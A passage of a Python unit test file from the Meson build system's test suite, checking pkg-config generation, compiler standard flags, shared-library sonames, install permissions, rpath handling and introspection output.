self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
# See common/47 pkgconfig-gen/meson.build for description of the case this test
with open(os.path.join(privatedir1, 'simple2.pc')) as f:
content = f.read()
self.assertIn('Libs: -L${libdir} -lsimple2 -lsimple1', content)
self.assertIn('Libs.private: -lz', content)
with open(os.path.join(privatedir1, 'simple3.pc')) as f:
content = f.read()
self.assertEqual(1, content.count('-lsimple3'))
with open(os.path.join(privatedir1, 'simple5.pc')) as f:
content = f.read()
self.assertNotIn('-lstat2', content)
@mock.patch.dict(os.environ)
def test_pkgconfig_uninstalled(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
self.build()
os.environ['PKG_CONFIG_LIBDIR'] = os.path.join(self.builddir, 'meson-uninstalled')
if is_cygwin():
os.environ['PATH'] += os.pathsep + self.builddir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir)
self.build()
self.run_tests()
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertFalse('blub_blob_blib' in pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
self.assertNotIn(" -Wall ", vala_command)
self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
def glob_sofiles_without_privdir(self, g):
files = glob(g)
return [f for f in files if not f.endswith('.p')]
def _test_soname_impl(self, libpath, install):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(self.glob_sofiles_without_privdir(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(self.glob_sofiles_without_privdir(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(self.glob_sofiles_without_privdir(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
testdir = os.path.join(self.common_test_dir, '39 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '39 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
def _test_stds_impl(self, testdir, compiler, p: str):
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
for v in compiler.get_options()['std'].choices:
lang_std = p + '_std'
# we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
# thus, C++ first
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
std_opt = '{}={}'.format(lang_std, v)
self.init(testdir, extra_args=['-D' + std_opt])
cmd = self.get_compdb()[0]['command']
# c++03 and gnu++03 are not understood by ICC, don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
if v != 'none' and not (compiler.get_id(), v) in skiplist:
cmd_std = " -std={} ".format(v)
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print('{} was {!r}'.format(lang_std, v))
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if p == 'c':
env_flag_name = 'CFLAGS'
elif p == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError('Language {} not defined.'.format(p))
env = {}
env[env_flag_name] = cmd_std
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars = env)
# ICC won't fail in the above because additional flags are needed to
# make unknown -std=... options errors.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc, 'c')
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp, 'cpp')
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir, extra_args='--unity=subprojects')
pdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/simpletest*.p'))
self.assertEqual(len(pdirs), 1)
self.assertPathExists(os.path.join(pdirs[0], 'simpletest-unity0.c'))
sdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/*sublib*.p'))
self.assertEqual(len(sdirs), 1)
self.assertPathExists(os.path.join(sdirs[0], 'sublib-unity0.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
Can't be an ordinary test because our installed_files.txt is very basic.
'''
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '195 install_mode')
self.init(testdir)
self.build()
self.install()
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
install umask of 022, regardless of the umask at time the worktree
was checked out or the build was executed.
'''
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
# NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
# the flags before returning them to -Lfoo -Lbar -lfoo -lbar
# but pkgconf seems to not do that. Sigh. Support both.
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
self.assertEqual(os.path.basename(t['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(t['target_sources'][0]['sources'][0]))
def test_introspect_installed(self):
testdir = os.path.join(self.linuxlike_test_dir, '7 library versions')
self.init(testdir)
install = self.introspect('--installed')
install = {os.path.basename(k): v for k, v in install.items()}
print(install)
if is_osx():
the_truth = {
'libmodule.dylib': '/usr/lib/libmodule.dylib',
'libnoversion.dylib': '/usr/lib/libnoversion.dylib',
'libonlysoversion.5.dylib': '/usr/lib/libonlysoversion.5.dylib',
'libonlysoversion.dylib': '/usr/lib/libonlysoversion.dylib',
'libonlyversion.1.dylib': '/usr/lib/libonlyversion.1.dylib',
'libonlyversion.dylib': '/usr/lib/libonlyversion.dylib',
'libsome.0.dylib': '/usr/lib/libsome.0.dylib',
'libsome.dylib': '/usr/lib/libsome.dylib',
}
the_truth_2 = {'/usr/lib/libsome.dylib',
'/usr/lib/libsome.0.dylib',
}
else:
the_truth = {
'libmodule.so': '/usr/lib/libmodule.so',
'libnoversion.so': '/usr/lib/libnoversion.so',
'libonlysoversion.so': '/usr/lib/libonlysoversion.so',
'libonlysoversion.so.5': '/usr/lib/libonlysoversion.so.5',
'libonlyversion.so': '/usr/lib/libonlyversion.so',
'libonlyversion.so.1': '/usr/lib/libonlyversion.so.1',
'libonlyversion.so.1.4.5': '/usr/lib/libonlyversion.so.1.4.5',
'libsome.so': '/usr/lib/libsome.so',
'libsome.so.0': '/usr/lib/libsome.so.0',
'libsome.so.1.2.3': '/usr/lib/libsome.so.1.2.3',
}
the_truth_2 = {'/usr/lib/libsome.so',
'/usr/lib/libsome.so.0',
'/usr/lib/libsome.so.1.2.3'}
self.assertDictEqual(install, the_truth)
targets = self.introspect('--targets')
for t in targets:
if t['name'] != 'some':
continue
self.assertSetEqual(the_truth_2, set(t['install_filename']))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
# C program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
# C++ program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
def test_global_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
if is_osx():
raise unittest.SkipTest('Global RPATHs via LDFLAGS not yet supported on MacOS (does anybody need it?)')
testdir = os.path.join(self.unit_test_dir, '80 global-rpath')
oldinstalldir = self.installdir
# Build and install an external library without DESTDIR.
# The external library generates a .pc file without an rpath.
yonder_dir = os.path.join(testdir, 'yonder')
yonder_prefix = os.path.join(oldinstalldir, 'yonder')
yonder_libdir = os.path.join(yonder_prefix, self.libdir)
self.prefix = yonder_prefix
self.installdir = yonder_prefix
self.init(yonder_dir)
self.build()
self.install(use_destdir=False)
# Since rpath has multiple valid formats we need to
# test that they are all properly used.
rpath_formats = [
('-Wl,-rpath=', False),
('-Wl,-rpath,', False),
('-Wl,--just-symbols=', True),
('-Wl,--just-symbols,', True),
('-Wl,-R', False),
('-Wl,-R,', False)
]
for rpath_format, exception in rpath_formats:
# Build an app that uses that installed library.
# Supply the rpath to the installed library via LDFLAGS
# (as systems like buildroot and guix are wont to do)
# and verify install preserves that rpath.
self.new_builddir()
env = {'LDFLAGS': rpath_format + yonder_libdir,
'PKG_CONFIG_PATH': os.path.join(yonder_libdir, 'pkgconfig')}
if exception:
with self.assertRaises(subprocess.CalledProcessError):
self.init(testdir, override_envvars=env)
continue
self.init(testdir, override_envvars=env)
self.build()
self.install(use_destdir=False)
got_rpath = get_rpath(os.path.join(yonder_prefix, 'bin/rpathified'))
self.assertEqual(got_rpath, yonder_libdir, rpath_format)
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
print(os.path.join(testdir, 'some_cross_tool.py'))
crossfile.write(textwrap.dedent('''\
[binaries]
c = '/usr/bin/{1}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
sometool.py = ['{0}']
someothertool.py = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
''').format(os.path.join(testdir, 'some_cross_tool.py'),
'gcc' if is_sunos() else 'cc'))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
'''
'''
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
